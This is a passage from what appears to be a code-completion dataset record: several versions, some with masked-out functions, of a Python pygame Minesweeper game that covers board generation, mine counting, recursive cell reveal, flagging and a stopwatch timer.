self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n", "step-4": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\nCELL_SIDE_LENGTH = 40\nCELL_MARGIN = 2\nGRID_HEIGHT = 10\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100\nDIFFICULTY = 0.1\nFPS = 30\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY)\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT + CELL_MARGIN * GRID_HEIGHT +\n Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH + CELL_MARGIN * GRID_WIDTH + \n X_BOARD_MARGIN * 2 + MENU_MARGIN)\nRED = 255, 0, 0\nYELLOW = 255, 255, 0\nGREEN = 0, 255, 0\nMIDGREEN = 40, 190, 40\nCYAN = 0, 255, 255\nBLUE = 0, 0, 255\nDARKBLUE = 20, 20, 60\nMAGENTA = 255, 0, 255\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGRAY = 200, 200, 200\nBG_COLOR = DARKBLUE\nCELL_COLOR = GRAY\nHIGHLIGHT_COLOR = CYAN\nFLAG_COLOR = MIDGREEN\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - CELL_MARGIN / 2,\n top - CELL_MARGIN / 2, CELL_SIDE_LENGTH + CELL_MARGIN, \n CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n", "step-5": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\n\n# TODO high scores, difficulties\n\n# Absolutes (in pixels where not otherwise stated)\nCELL_SIDE_LENGTH = 40 # Side length of each cell\nCELL_MARGIN = 2 # Gap between cells\nGRID_HEIGHT = 10 # How many cells are in the grid\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50 # Gap between grid and sides of board\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100 # Amount of space on the right dedicated to the menu\nDIFFICULTY = 0.1 # Ratio of bombs (10% by default)\nFPS = 30 # frames per second (window refresh speed)\n\n# Relatives (so board size can easily be changed)\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY) # Default about 10% of the board is mines\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN\n\n# R G B (not all used, but kept so theme can easily be changed)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMIDGREEN = (40, 190, 40)\nCYAN = (0, 255, 255)\nBLUE = (0, 0, 255)\nDARKBLUE = (20, 20, 60)\nMAGENTA = (255, 0, 255)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGRAY = (200, 200, 200)\n\nBG_COLOR = DARKBLUE # Background color\nCELL_COLOR = GRAY # Universal cover color\nHIGHLIGHT_COLOR = CYAN # Cell the cursor is currently hovering over\nFLAG_COLOR = MIDGREEN\n\n# Symbols\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n self.mouse_x = 0 # Stores x-coordinate of mouse event\n self.mouse_y = 0 # Stores y-coordinate of mouse event\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n\n while True:\n left_click = False\n right_click = False\n\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n self.create_menu()\n\n font = pygame.font.SysFont(\"times new roman\", 25)\n\n # Timer (will be used to implement high scores)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n\n # Mouse event handling\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit() # Even if the window closes, we still need to manually stop the processes\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos # For hovering info\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n\n # If user decided to start over, reinitialize game\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n\n # TODO tweak spacing on text\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n\n a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)\n b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont(\"times new roman\", 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event\n\n # Highlight cell\n 